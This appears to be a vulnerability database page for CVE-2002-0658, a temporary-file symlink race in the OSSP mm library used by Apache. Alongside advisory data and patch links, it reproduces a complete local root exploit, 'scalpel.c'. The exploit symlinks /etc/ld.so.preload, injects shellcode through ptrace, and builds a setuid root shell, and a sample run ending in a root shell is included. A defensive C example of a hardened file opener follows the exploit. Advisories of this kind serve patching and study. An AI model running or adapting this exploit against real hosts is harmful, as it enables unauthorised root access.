CVE-2002-0658
CVSS 6.2
Published: 2002-08-12 00:00:00
Revised: 2013-09-04 00:18:30

[Original] OSSP mm library (libmm) before 1.2.0 allows the local Apache user to gain privileges via temporary files, possibly via a symbolic link attack.


[CNNVD] MM Shared Memory Library Temporary File Local Privilege Escalation Vulnerability (CNNVD-200208-069)

OSSP MM is a shared memory library.
OSSP MM contains a race condition vulnerability that a local attacker can exploit to escalate privileges.
Marcus Meissner and Sebastian Krahmer discovered a race condition in the MM shared library's handling of temporary files; a local attacker can exploit it to escalate privileges.
The Apache web server uses the MM shared library, so an attacker who already holds the Apache user's privileges can exploit this vulnerability to obtain root privileges.

- CVSS (base score)

CVSS score: 6.2 [MEDIUM]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may result in a complete system outage]
Access complexity: HIGH [exploitation requires specialized access conditions]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication required]

- CPE (affected platforms and products)

cpe:/a:ossp:mm:1.1.3
cpe:/a:ossp:mm:1.1.0
cpe:/a:ossp:mm:1.1.2
cpe:/a:ossp:mm:1.0.2
cpe:/a:ossp:mm:1.0.0
cpe:/a:ossp:mm:1.0.6
cpe:/a:ossp:mm:1.0.3
cpe:/a:ossp:mm:1.0.4
cpe:/a:ossp:mm:1.0.1
cpe:/a:ossp:mm:1.0.7
cpe:/a:ossp:mm:1.1.1
cpe:/a:ossp:mm:1.0.8
cpe:/a:ossp:mm:1.0.5
cpe:/a:ossp:mm:1.0.9
cpe:/a:ossp:mm:1.0.11
cpe:/a:ossp:mm:1.0.12
cpe:/a:ossp:mm:1.0.10

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0658
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0658
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200208-069
(official data source) CNNVD

- Other links and resources

http://www.linux-mandrake.com/en/security/2002/MDKSA-2002-045.php
(VENDOR_ADVISORY)  MANDRAKE  MDKSA-2002:045
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SN-02:05.asc
(UNKNOWN)  FREEBSD  FreeBSD-SN-02:05
http://www.securityfocus.com/bid/5352
(UNKNOWN)  BID  5352
http://www.redhat.com/support/errata/RHSA-2003-158.html
(UNKNOWN)  REDHAT  RHSA-2003:158
http://www.redhat.com/support/errata/RHSA-2002-163.html
(UNKNOWN)  REDHAT  RHSA-2002:163
http://www.novell.com/linux/security/advisories/2002_028_mod_ssl.html
(UNKNOWN)  SUSE  SuSE-SA:2002:028
http://www.iss.net/security_center/static/9719.php
(UNKNOWN)  XF  mm-tmpfile-symlink(9719)
http://www.debian.org/security/2002/dsa-137
(UNKNOWN)  DEBIAN  DSA-137
http://rhn.redhat.com/errata/RHSA-2002-164.html
(UNKNOWN)  REDHAT  RHSA-2002:164
http://rhn.redhat.com/errata/RHSA-2002-156.html
(UNKNOWN)  REDHAT  RHSA-2002:156
http://rhn.redhat.com/errata/RHSA-2002-154.html
(UNKNOWN)  REDHAT  RHSA-2002:154
http://rhn.redhat.com/errata/RHSA-2002-153.html
(UNKNOWN)  REDHAT  RHSA-2002:153
http://online.securityfocus.com/advisories/4392
(UNKNOWN)  HP  HPSBTL0208-056
ftp://ftp.caldera.com/pub/security/OpenLinux/CSSA-2002-032.0.txt
(UNKNOWN)  CALDERA  CSSA-2002-032.0

- Vulnerability information

MM Shared Memory Library Temporary File Local Privilege Escalation Vulnerability
Medium severity  Race condition
2002-08-12 00:00:00 2005-05-02 00:00:00
Local

- Advisories and patches

        Workaround:
        If you cannot install the patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
        * No suitable workaround is available at this time.
        Vendor patches:
        Debian
        ------
        Debian has released a security advisory (DSA-137-1) and the corresponding patches:
        DSA-137-1: New mm packages fix insecure temporary file creation
        Link:
        http://www.debian.org/security/2002/dsa137-

        Patch download:
        Source archives:
          http://security.debian.org/pool/updates/main/m/mm/mm_1.0.11-1.2.dsc
            Size/MD5 checksum: 553 6bf8816fa3395bc685451501f203b60b
          http://security.debian.org/pool/updates/main/m/mm/mm_1.0.11.orig.tar.gz
            Size/MD5 checksum: 142893 e8f12c85582bd9994369ea4098c3424c
          http://security.debian.org/pool/updates/main/m/mm/mm_1.0.11-1.2.diff.gz
            Size/MD5 checksum: 5184 81bd3aaa499f029254fa64a7fc9a1660
        Alpha architecture:
          http://security.debian.org/pool/updates/main/m/mm/libmm10_1.0.11-1.2_alpha.deb
            Size/MD5 checksum: 13788 e45aec9dc3688a0a8500c88d04c49f33
          http://security.debian.org/pool/updates/main/m/mm/libmm10-dev_1.0.11-1.2_alpha.deb
            Size/MD5 checksum: 32060 3a20277fd97bdf52afc511c5cf7a922a
        ARM architecture:
          http://security.debian.org/pool/updates/main/m/mm/libmm10_1.0.11-1.2_arm.deb
            Size/MD5 checksum: 11876 36bf40e33e1e58ab59bdbc7e6b27327a
          http://security.debian.org/pool/updates/main/m/mm/libmm10-dev_1.0.11-1.2_arm.deb
            Size/MD5 checksum: 29194 eeba5fb89081bfc67cc1eb4c8ae7beaf
        Intel ia32 architecture:
          http://security.debian.org/pool/updates/main/m/mm/libmm10_1.0.11-1.2_i386.deb
            Size/MD5 checksum: 12100 52a6b793c890790319b5d328ee1b7a0d
          http://security.debian.org/pool/updates/main/m/mm/libmm10-dev_1.0.11-1.2_i386.deb
            Size/MD5 checksum: 28924 888a040a28f6c942424b609bb92ddc88
        Motorola 680x0 architecture:
          http://security.debian.org/pool/updates/main/m/mm/libmm10_1.0.11-1.2_m68k.deb
            Size/MD5 checksum: 11560 f86c03c040087127c74f8ddb0ebb23b4
          http://security.debian.org/pool/updates/main/m/mm/libmm10-dev_1.0.11-1.2_m68k.deb
            Size/MD5 checksum: 28752 aba689b014f669d0cadeefaa7720b9d7
        PowerPC architecture:
          http://security.debian.org/pool/updates/main/m/mm/libmm10_1.0.11-1.2_powerpc.deb
            Size/MD5 checksum: 12286 159aa5cb4938fa844ad6b93990d125b3
          http://security.debian.org/pool/updates/main/m/mm/libmm10-dev_1.0.11-1.2_powerpc.deb
            Size/MD5 checksum: 30340 785b5ed0a9cb5b00f4e3182b7a457b44
        Sun Sparc architecture:
          http://security.debian.org/pool/updates/main/m/mm/libmm10_1.0.11-1.2_sparc.deb
            Size/MD5 checksum: 12170 f4f4911490dcec804e2215d8c6dcb373
          http://security.debian.org/pool/updates/main/m/mm/libmm10-dev_1.0.11-1.2_sparc.deb
            Size/MD5 checksum: 29664 fa63ddb6ab216e7d7d7caa09531a6967
        Debian GNU/Linux 3.0 alias woody
        - ------------------------------------
        Source archives:
          http://security.debian.org/pool/updates/main/m/mm/mm_1.1.3-6.1.dsc
            Size/MD5 checksum: 565 90c7910a97454ac9aa1abc0bc79cf316
          http://security.debian.org/pool/updates/main/m/mm/mm_1.1.3.orig.tar.gz
            Size/MD5 checksum: 137951 ba14a90239e26337eef079b698f35eae
          http://security.debian.org/pool/updates/main/m/mm/mm_1.1.3-6.1.diff.gz
            Size/MD5 checksum: 4300 44c3bd2710d53798f19228ffb4a32b78
        Alpha architecture:
          http://security.debian.org/pool/updates/main/m/mm/libmm11_1.1.3-6.1_alpha.deb
            Size/MD5 checksum: 15884 e95d9355d8c1ce4e67b057e9f7b644ed
          http://security.debian.org/pool/updates/main/m/mm/libmm11-dev_1.1.3-6.1_alpha.deb
            Size/MD5 checksum: 35894 613548b6398dff2a72d8831dfa0bd405
        ARM architecture:
          http://security.debian.org/pool/updates/main/m/mm/libmm11_1.1.3-6.1_arm.deb
            Size/MD5 checksum: 14082 bc8d016410dc8ae21bd273239432e58e
          http://security.debian.org/pool/updates/main/m/mm/libmm11-dev_1.1.3-6.1_arm.deb
            Size/MD5 checksum: 33312 e148f2ef714cc6cd7b4021ec75fb19e0
        Intel ia32 architecture:
          http://security.debian.org/pool/updates/main/m/mm/libmm11_1.1.3-6.1_i386.deb
            Size/MD5 checksum: 14090 f118e324b0b4baf755e4b6c0532138f0
          http://security.debian.org/pool/updates/main/m/mm/libmm11-dev_1.1.3-6.1_i386.deb
            Size/MD5 checksum: 32750 d089be8693d8c2dcaae3fb953d9eec54
        Intel ia64 architecture:
          http://security.debian.org/pool/updates/main/m/mm/libmm11_1.1.3-6.1_ia64.deb
            Size/MD5 checksum: 18668 a2a7024d9f7fae7823bf6f4eb7d9f04d
          http://security.debian.org/pool/updates/main/m/mm/libmm11-dev_1.1.3-6.1_ia64.deb
            Size/MD5 checksum: 37466 1b6a21155340aa8ba1a407ac3ca6f92e
        HP Precision architecture:
          http://security.debian.org/pool/updates/main/m/mm/libmm11_1.1.3-6.1_hppa.deb
            Size/MD5 checksum: 15124 a727a96c2deaecc8744a38c2790dd3c6
          http://security.debian.org/pool/updates/main/m/mm/libmm11-dev_1.1.3-6.1_hppa.deb

- Vulnerability information (21667)

MM 1.0.x/1.1.x Shared Memory Library Temporary File Privilege Escalation Vulnerability (EDBID:21667)
linux local
2002-07-29 Verified
0 Sebastian Krahmer
N/A
source: http://www.securityfocus.com/bid/5352/info

The MM Shared Memory library is reported to be prone to a race condition with regards to temporary files which may enable a local attacker to gain elevated privileges. This issue may reportedly be exploited by an attacker with shell access as the Apache webserver user to gain root privileges on a vulnerable host. 

/*** scalpel.c -- local apache/PHP root via libmm (apache-user -> root)
 ***
 *** (C) 2002 Sebastian Krahmer proof of concept exploit.
 ***
 *** Exploiting conditions:
 ***
 *** Apache is linked against libmm which has /tmp races.
 *** Upon Apache start or restart code is executed like
 *** unlink("/tmp/session_mm.sem"); open("/tmp/session_mm.sem", O_RDWR|O_CREAT).
 *** If attacker exploited any CGI or PHP script remotely he gained
 *** apache-user and can go one step further to get root by:
 ***
 *** 1) STOPing all httpd's and bring root to execute /etc/rc.d/apache restart
 ***    Its very likely root does so because webserver just doesnt work anymore
 ***    (all childs are STOPed). One can also send him fake-mail
 ***    from httpd-watchdog that he has to invoke the command.
 *** 2) Install signal-handler and using 2.4 directory notifying to see when
 ***    /tmp/session_mm.sem is unlinked. Create link to /etc/ld.so.preload
 ***    immediately which makes Apache creating that file.
 *** 3) Trigger execution of a CGI script where Apache leaks a descriptor
 ***    (r+w) to /etc/ld.so.preload to the child.
 *** 4) Ptrace that script, inject code which writes content to preload-file.
 *** 5) Execute suid-helper to execute code as root.
 ***
 *** Note in 4) that we cant ptrace httpd alone because it setuid'ed from root
 *** to apache-user thus setting id-changed flag. By triggering execve() of
 *** a CGI script this flag is cleared and we can hijack process.
 ***
 *** assert(must-be-apache-user && must-have-a-cgi-script-installed &&
 ***        must-bring-root-to-restart-apache);
 ***
 ***
 *** wwwrun@liane:~> cc scalpel.c -Wall
 *** wwwrun@liane:~> ./a.out /cgi-bin/genindex.pl
 *** httpd(2368): Operation not permitted
 *** Creating /tmp/boomsh
 *** Creating /tmp/boomso
 *** Installed signal-handler. Waiting for apache restart.
 *** ++++++Forking off proc-scan to attach to CGI-script.
 *** Triggering CGI: /cgi-bin/genindex.pl
 *** Got cgi-bin PID 2460
 *** Injecting of write-code finished.
 *** blub
 *** +sh-2.05# id
 *** uid=0(root) gid=65534(nogroup) groups=65534(nogroup)
 *** sh-2.05#
 ***/

#define _GNU_SOURCE
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <signal.h>
#include <sys/stat.h>
#include <dirent.h>
#include <sys/types.h>
#include <string.h>
#include <errno.h>
#include <sys/ptrace.h>
#include <asm/ptrace.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <netdb.h>
#include <stdlib.h>
#include <sys/wait.h>

/* Please do not complain about ugly code; its a 1h exploit.
 * For good code see crypto-pty for example ;-)
 */
int create_link()
{
	symlink("/etc/ld.so.preload", "/tmp/session_mm.sem");
	return 0;
}


void die(char *s)
{
	perror(s);
	exit(errno);
}

void sig_x(int x)
{
	create_link();
	printf("+");
}


void usage()
{
	printf("Usage: scalpel <cgi-script>\n\n"
	       "i.e. ./scalpel /cgi-bin/moo.cgi\n");
	exit(1);
}

int scan_proc()
{
	int lastpid, fd, i, pid, done = 0;
	unsigned int eip;
	char fname[1024];
	char code[] = 
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\xe8\x10\x00\x00\x00\x2f\x74\x6d\x70\x2f\x62\x6f"
		"\x6f\x6d\x73\x68\x2e\x73\x6f\x0a\x00\xb8\x04\x00"
		"\x00\x00\xbb\x05\x00\x00\x00\x59\xba\x0f\x00\x00"
		"\x00\xcd\x80\xb8\x01\x00\x00\x00\x31\xdb\xcd\x80";
	unsigned long *p;

	printf("Forking off proc-scan to attach to CGI-script.\n");

	if (fork() > 0)
		return 0;

	lastpid = getpid();

	while (!done) {
		for (i = 0; i < 100; ++i) {
			snprintf(fname, sizeof(fname), "/proc/%d/cmdline", lastpid+i);
			if ((fd = open(fname, O_RDONLY)) < 0)
				continue;
			read(fd, fname, sizeof(fname));
			close(fd);
			if (strcmp(fname, "/usr/bin/perl") == 0) {
				if (ptrace(PTRACE_ATTACH, lastpid+i,0,0) < 0) {
					pid = lastpid+i;
					done = 1;
					break;
				}
			}
		}
	}
			
	printf("Got cgi-bin PID %d\n", pid);

	waitpid(pid, NULL, 0);

	eip = ptrace(PTRACE_PEEKUSER, pid, 4*EIP, 0);
	if (errno)
		die("ptrace");
	for (p = (unsigned long*)code; i < sizeof(code); i+= 4, ++p) {
		if (ptrace(PTRACE_POKETEXT, pid, eip + i, *p) < 0)
			die("ptrace");
	}

	if (ptrace(PTRACE_POKEUSER, pid, 4*EIP, eip+4) < 0)
		die("ptrace");

	if (ptrace(PTRACE_DETACH, pid, 0, 0) < 0)
		die("ptrace");
	printf("Injecting of write-code finished.\n");
	exit(0);
}


int tcp_connect(const char *host, u_short port)
{
	int sock;
	struct hostent *he;
	struct sockaddr_in sin;

	if ((sock = socket(PF_INET, SOCK_STREAM, 0)) < 0)
		die("sock");

	if ((he = gethostbyname(host)) == NULL) {
		herror("gethostbyname");
		exit(EXIT_FAILURE);
	}

	memset(&sin, 0, sizeof(sin));
	memcpy(&sin.sin_addr, he->h_addr, he->h_length);
	sin.sin_family = AF_INET;
	sin.sin_port = port == 0 ? htons(80):htons(port);

	if (connect(sock, (struct sockaddr*)&sin, sizeof(sin)) < 0) {
		close(sock);
		return -1;
	}
	return sock;
}


int trigger_cgi(const char *cgi)
{
	char cmd[1024];
	int sock = tcp_connect("127.0.0.1", 80);

	printf("Triggering CGI: %s\n", cgi);

	snprintf(cmd, sizeof(cmd), "GET %s HTTP/1.0\r\n\r\n", cgi);
	if (write(sock, cmd, strlen(cmd)) < 0)
		die("write");
	sleep(1);
	close(sock);
	return 0;
}

int create_boomsh()
{
	FILE *f = fopen("/tmp/boomsh.c", "w+");

	printf("Creating /tmp/boomsh\n");
	if (!f)
		die("fopen");
	fprintf(f, "#include <stdio.h>\nint main()\n{\nchar *a[]={\"/bin/sh\",0};"
		   "setuid(0); execve(*a, a, NULL);return 1;}\n");
	fclose(f);
	system("gcc /tmp/boomsh.c -o /tmp/boomsh");
	return 0;
}


int create_boomso()
{
	FILE *f = fopen("/tmp/boomso.c", "w+");

	printf("Creating /tmp/boomso\n");
	if (!f)
		die("fopen");
	fprintf(f, "#include <stdio.h>\nvoid _init(){if (geteuid()) return;printf(\"blub\n\");"
		   "chown(\"/tmp/boomsh\",0, 0); chmod(\"/tmp/boomsh\", 04755);"
	           "unlink(\"/etc/ld.so.preload\");exit(0);}");
	fclose(f);
	system("gcc -c -fPIC /tmp/boomso.c -o /tmp/boomso.o;"
	       "ld -Bshareable /tmp/boomso.o -o /tmp/boomsh.so");
	return 0;
}


int main(int argc, char **argv)
{
	int fd;
	struct stat st;
	char *cgi = NULL;
	extern char **environ;
	char *boomsh[] = {"/tmp/boomsh", NULL};
	char *suid[] = {"/bin/su", NULL};

	if (argc < 2)
		usage();

	cgi = strdup(argv[1]);

	setbuffer(stdout, NULL, 0);

	system("killall -STOP httpd");

	create_boomsh();
	create_boomso();

	if ((fd = open("/tmp", O_RDONLY|O_DIRECTORY)) < 0) {
		return -1;
	}

	if (fcntl(fd, F_SETSIG, SIGUSR1) < 0) {
		return -1;
	}

	if (fcntl(fd, F_NOTIFY, DN_MODIFY|DN_DELETE|DN_RENAME|DN_ATTRIB
			       |DN_CREATE|DN_MULTISHOT|DN_ACCESS) < 0) {
		return -1;
	}
	
	signal(SIGUSR1, sig_x);

	printf("Installed signal-handler. Waiting for apache restart.\n");

	/* wait for /etc/ld.so.preload to apear */
	while (stat("/etc/ld.so.preload", &st) < 0)
		sleep(1);


	/* forks off daemon */
	scan_proc();

	/* Trigger execution of a CGI-script */
	trigger_cgi(cgi);

	for(;;) {
		sleep(1);
		memset(&st, 0,sizeof(st));
		stat("/etc/ld.so.preload", &st);
		if (st.st_size > 0)
			break;
		if (stat("/tmp/boomsh", &st) == 0 && st.st_uid == 0)
			break;
	}

	/* Apropriate content is in /etc/ld.so.preload now */
	if (fork() == 0) {
		execve(*suid, suid, NULL);
		exit(1);
	}
	sleep(3);
	execve(*boomsh, boomsh, environ);

	return 0;
}
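The root cause the exploit header spells out is the unlink-then-create sequence on a fixed name in a world-writable directory: whoever re-creates that name as a symbolic link inside the window between the two calls decides which file the privileged process ends up creating. The C program below is an added example, not part of the Bugtraq entry, the exploit above, or the libmm project's own 1.2.0 fix. It puts the racy pattern next to a hardened opener and runs both in a throwaway directory created with mkdtemp(); the `race_hook_t` callback, the `victim` file name and the `demo()` harness are constructed for the demonstration and stand in for the attacker winning the race.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

/* Constructed for the demo: runs in the window between unlink() and open()
 * and stands in for another local user winning the race. */
typedef void (*race_hook_t)(const char *sem_path, const char *target);

/* The sequence described in the exploit header: unlink, then O_CREAT
 * without O_EXCL. A symlink planted in the window is followed silently,
 * so the file it points at is created or truncated with our privileges. */
int open_sem_vulnerable(const char *sem_path, const char *target, race_hook_t racer)
{
    unlink(sem_path);
    if (racer)
        racer(sem_path, target);
    return open(sem_path, O_RDWR | O_CREAT, 0644);
}

/* Hardened opener (added example, not libmm's actual fix):
 *  - O_EXCL makes open() fail if anything already exists at the path,
 *    a symlink included, whatever it points at;
 *  - O_NOFOLLOW refuses to traverse a symlink in the final component;
 *  - fstat() on the descriptor confirms we own a plain, single-link file. */
int open_sem_hardened(const char *sem_path, const char *target, race_hook_t racer)
{
    struct stat st;
    int fd;

    unlink(sem_path);
    if (racer)
        racer(sem_path, target);
    fd = open(sem_path, O_RDWR | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;                      /* EEXIST or ELOOP: someone raced us */
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1
        || st.st_uid != geteuid()) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

/* The racer's move in the demo: point the semaphore name at the target. */
static void plant_symlink(const char *sem_path, const char *target)
{
    symlink(target, sem_path);
}

/* Exercises both openers in a private scratch directory (constructed;
 * nothing under /tmp/session_mm.sem or /etc is touched). Returns 1 when
 * the vulnerable opener followed the link and the hardened one refused. */
int demo(void)
{
    char dir[] = "/tmp/mmdemo.XXXXXX";
    char sem[128], target[128];
    struct stat st;
    int fd, followed, refused;

    if (!mkdtemp(dir))
        return 0;
    snprintf(sem, sizeof(sem), "%s/session_mm.sem", dir);
    snprintf(target, sizeof(target), "%s/victim", dir);  /* stands in for a file only root may write */

    fd = open_sem_vulnerable(sem, target, plant_symlink);
    followed = (fd >= 0 && stat(target, &st) == 0);     /* target now exists: the link was followed */
    if (fd >= 0)
        close(fd);
    unlink(target);

    fd = open_sem_hardened(sem, target, plant_symlink);
    refused = (fd < 0 && stat(target, &st) < 0);        /* open failed and target was never created */
    if (fd >= 0)
        close(fd);

    unlink(sem);
    unlink(target);
    rmdir(dir);
    return followed && refused;
}

int main(void)
{
    if (demo())
        puts("vulnerable opener followed the planted symlink; hardened opener refused");
    else
        puts("demo did not behave as expected");
    return 0;
}
```

Run it as an unprivileged user: demo() returns 1 when the O_CREAT-only opener created the victim file through the planted link while the O_EXCL|O_NOFOLLOW opener failed with EEXIST and never touched it. The fstat() check after a successful open is the part to keep when the directory is not fully trusted; it rejects anything that is not a regular file owned by the caller. Creating the semaphore file with mkstemp() in a directory writable only by the server is the more robust design; the fixed name is kept here only to mirror the call sequence the page describes.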

		

- Vulnerability information

5150
OSSP mm Library Symlink Privilege Escalation
Local Access Required Race Condition

- Vulnerability description

Unknown or Incomplete

- Timeline

2004-04-09 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete
 

 
